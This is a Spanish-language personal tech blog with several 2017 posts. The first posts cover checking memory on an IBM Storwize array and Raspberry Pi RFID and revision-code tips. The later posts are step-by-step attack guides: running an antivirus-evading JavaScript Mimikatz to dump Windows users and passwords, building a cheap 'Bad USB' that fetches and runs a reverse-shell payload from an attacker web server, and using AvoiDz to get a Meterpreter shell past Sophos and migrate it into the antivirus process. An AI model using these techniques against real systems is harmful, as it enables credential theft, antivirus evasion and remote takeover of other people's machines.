miércoles, 13 de septiembre de 2017

Ver memoria instalada Storage IBM Storewize 3700

Como no encontré por ningún lado en la interfaz gráfica, les dejo el comando para ver la memoria instalada en cada canister del Storage.

Les dejo sólo el del canister 2, para el uno sólo deben reemplazar el 2 por el uno luego de la coma:

IBM_Storwize:ARG1STO01:superuser>lsnodecanisterhw -delim , 2
id,2
name,node2
status,online
IO_group_id,0
IO_group_name,io_grp0
hardware,TB4
actual_different,no
actual_valid,yes
memory_configured,4
memory_actual,4
memory_valid,yes
cpu_count,1          
cpu_socket,1
cpu_configured,2 core Intel(R) Celeron(R) CPU G530T @ 2.00GHz
cpu_actual,2 core Intel(R) Celeron(R) CPU G530T @ 2.00GHz
cpu_valid,yes
adapter_count,5
adapter_location,0
adapter_configured,6Gb/s SAS adapter
adapter_actual,6Gb/s SAS adapter
adapter_valid,yes
adapter_location,0
adapter_configured,Midplane bus adapter
adapter_actual,Midplane bus adapter
adapter_valid,yes
adapter_location,0
adapter_configured,1Gb/s Ethernet adapter
adapter_actual,1Gb/s Ethernet adapter
adapter_valid,yes
adapter_location,0
adapter_configured,1Gb/s Ethernet adapter
adapter_actual,1Gb/s Ethernet adapter
adapter_valid,yes
adapter_location,1
adapter_configured,Four port 8Gb/s FC adapter
adapter_actual,Four port 8Gb/s FC adapter
adapter_valid,yes
ports_different,no
IBM_Storwize:ARG1STO01:superuser>

viernes, 1 de septiembre de 2017

Lector de Tarjetas RFID-RC522 en Raspberry Pi B+


Les dejo un extracto de wikipedia de lo que es RFID:
RFID o identificación por radiofrecuencia (del inglés Radio Frequency Identification) es un sistema de almacenamiento y recuperación de datos remoto que usa dispositivos denominados etiquetas, tarjetas o transpondedores RFID. El propósito fundamental de la tecnología RFID es transmitir la identidad de un objeto (similar a un número de serie único) mediante ondas de radio. Las tecnologías RFID se agrupan dentro de las denominadas Auto ID (automatic identification, o identificación automática).
Las etiquetas RFID (RFID tag en inglés) son unos dispositivos pequeños, similares a una pegatina, que pueden ser adheridas o incorporadas a un producto, un animal o una persona. Contienen antenas para permitirles recibir y responder a peticiones por radiofrecuencia desde un emisor-receptor RFID. Las etiquetas pasivas no necesitan alimentación eléctrica interna, mientras que las activas sí lo requieren. Una de las ventajas del uso de radiofrecuencia (en lugar, por ejemplo, de infrarrojos) es que no se requiere visión directa entre emisor y receptor.


Primero conectamos el RFID-RC522 a los pines GPIO de la Raspberry pi:

3.3v   al PIN-1   (el que se identifica en la placa con P1 en la imagen el de arriba a la izquierda)
RST   al PIN 22 (GPIO25 verde)
GND  al PIN 6   (GND negro)
MISO al PIN 21 (GPIO 9 verde)
SCK   al PIN 23 (GPIO 11 verde)
SDA   al PIN 24 (GPIO 8 verde)
IRQ no lo utilizamos


Les dejo la imagen de la raspberry que utilicé y sus pines GPIO:


Habilitamos el SPI:
pi@raspberrypi:~ $ sudo raspi-config






Reiniciamos la raspberry:
sudo reboot


Verificamos que haya cargado el spi:
pi@raspberrypi:~ $ lsmod |grep spi


Instalamos ó verificamos que tengamos python instalado:
pi@raspberrypi:~ $ sudo apt-get install python2.7-dev



Descargamos SPI-Py con git y lo instalamos:

pi@raspberrypi:~ $ git clone https://github.com/lthiery/SPI-Py.git
pi@raspberrypi:~ $ cd SPI-Py 
pi@raspberrypi:~ $  sudo python setup.py install



Instalamos MFRC522-python y ejecutamos el Read.py, probar leer la tarjeta y el llavero:

Les dejo un video usandolo:



Fuentes: 

https://es.wikipedia.org/wiki/RFID
https://github.com/lthiery/SPI-Py/
https://github.com/mxgxw/MFRC522-python

martes, 29 de agosto de 2017

Ver versión y revisión de raspberry pi

Ejecutamos lo siguiente: 

cat /proc/cpuinfo |grep Revision

Vemos que devuelve:

Revision  : 000f

Según esta tablita deducimos el valor:

'0002' => 'Model B Revision 1.0',
'0003' => 'Model B Revision 1.0 + Fuses mod and D14 removed',
'0004' => 'Model B Revision 2.0 256MB', (Sony)
'0005' => 'Model B Revision 2.0 256MB', (Qisda)
'0006' => 'Model B Revision 2.0 256MB', (Egoman)
'0007' => 'Model A Revision 2.0 256MB', (Egoman)
'0008' => 'Model A Revision 2.0 256MB', (Sony)
'0009' => 'Model A Revision 2.0 256MB', (Qisda)
'000d' => 'Model B Revision 2.0 512MB', (Egoman)
'000e' => 'Model B Revision 2.0 512MB', (Sony)
'000f' => 'Model B Revision 2.0 512MB', (Qisda)


lunes, 14 de agosto de 2017

Mimikatz Indetectable

Leí por ahí lo fácil que era usar Mimikatz, pero era detectado por cualquier antivirus. Buscando un poco me topé con que hay una versión en Java Script que es indetectable. 

Descargamos el katz.js del siguiente enlace:
https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f/archive/2adcc9d2570b4367c6cc405e5a5969863d04fc9b.zip

Lo ejecutamos simplemente con el siguiente comando y esperamos unos minutos:

c:\> cscript katz.js



Finalmente ejecutamos estos dos comandos:

privilege::debug
sekurlsa::logonpasswords

Y obtendremos los usuarios, el dominio y sus contraseñas:



FUENTE: https://github.com/gentilkiwi/mimikatz

lunes, 7 de agosto de 2017

Shell Reversa con Bad USB Casero a Bajo Costo


Nos descargamos el IDE de Arduino de la siguiente página: 

https://www.arduino.cc/en/Main/Donate



Lo instalamos y damos todas las opciones siguiente -> siguiente por defecto:




Si nos pide instalar algo como esto, le damos confiar siempre e instalar:




Abrimos el Arduino y vamos a Archivo -> Preferencias:



Colocamos en Tarjetas adicionales lo siguiente:
http://digistump.com/package_digistump_index.json y damos ok:



Clickeamos en Herramientas -> Placa: "Arduino/Genuino Uno" -> "Gestor de tarjetas ..."



Seleccionamos "Digistump AVR Boards by Digistump" -> Instalar
Esperamos que instale -> Cerrar:




Nuevamente vamos al mismo menú -> Herramientas -> Placa -> "Digispark (Default - 16.5mhz)":



Descargamos el Digistump Drivers desde: https://github.com/digistump/DigistumpArduino/releases



Descomprimimos y ejecutamos el siguiente archivo:



Abrimos el IDE de Arduino y vamos a > Archivo > Ejemplos > DigisparkKeyboard > Keyboard



Vamos luego a > Herramientas > Programador: "USBtinyISP" > USBtinyISP



Descargamos el .ino que hice para tipear automáticamente de la siguiente url: https://github.com/tirher/Arduino



Borramos lo que teníamos previamente en el IDE de Arduino y pegamos lo que descargamos del link anterior, debería quedar así:



Hacemos click en el tilde de arriba a la izquierda como indica en la imagen y luego veremos algo como muestra debajo de la flecha:



Luego seleccionamos la flecha que indica a la derecha y vemos abajo de todo en la ventana negra que nos indica cuando ingresar el USB Atiny85. Cuando aparece "Plug in device now ..." lo conectamos:



Cuando indique "100 % complete" lo desconectamos y ya tenemos el bad usb listo:



En el post previo mostré como utlizar avoid para hacer una shell reversa: http://redes-seguridad.blogspot.com.ar/2017/07/reverse-shell-indetectable-por-sophos.html ahora la voy a publicar en un webserver para poder descargarla u ejecutarla directamente del usb.

Iniciamos en el kali el apache2 y copiamos el py.exe en la ruta /var/www/html y verificamos que lo pueda acceder por una web:



Luego ejecutamos el siguiente comando, si ó si tiene que ser desde el terminal dentro del entorno gráfico, sino no funcionará:

root@kali:~/Desktop/avoidz# ./avoidz.rb -h 192.168.1.43 -f py

Cuando nos pregunte: "Whould you like to start a listener? (Y/n)" le indicamos que si y vemos como se abre solo el msfconsole y queda a la escucha esperando:



Conectamos el Bad USB en el windows y veremos que descargará el py.exe desde nuestro webserver y lo ejecutará:



Luego de unos segundos veremos la conexión reversa desde el windows al kali linux:



Vemos las sesiones abiertas y nos conectamos:



domingo, 16 de julio de 2017

Reverse Shell Indetectable por Sophos con AvoiDz

En la versión de Kali que fue probado:



El windows que fue "Atacado" es: 



Descargamos el AvoiDz de gitHub:

cd Desktop/
git clone https://github.com/M4sc3r4n0/avoidz.git
cd avoidz
chmod +x setup.sh
./setup.sh



Verifica las dependencias, las que no tenga las instala:




Ejecutamos sin parametros para ver las opciones:

./avoidz.rb




Ejecutamos lo siguiente especificando la ip en el valor -h esperamos que genere el payload y al final le damos si con la opción Y como muestra la imagen. Tener en cuenta que esto sí o si hay que ejecutarlo desde el entorno gráfico, ya que si lo ejecutamos por ssh no funcionará.

./avoidz.rb -h 'ifconfig eth0 | grep inet | awk {'print $2'}' -f py



Se abre automáticamente la siguiente ventana al darle Y en la pantalla anterior:



El py.exe generado lo copiamos al windows mediante winSCP ó cualquier otro programa para pasar archivos de linux a linux.



Vemos que al ejecutar el py.exe en el windows no lo detecta como virus el antivirus. En el kali vemos que abre la conexión, vemos en la siguiente imagen, ejecutamos los siguientes comandos para ver las sesiones y conectarnos:

sessions
session 1



Ejecutamos sysinfo desde el meterpreter y vemos que estamos conectado al windows:

sysinfo



Vemos los procesos corriendo en el windows:

ps



Vemos el pid del Sophos en la primer columna 5824:



Para migrar el proceso del shell reverso que vemos como PowerShell lo migraremos al PID del sophos:

migrate 5824



También vemos de escanearlo con el antivirus:



No detecta ningún virus:



La versión es la del 2017 actualizada al día de hoy: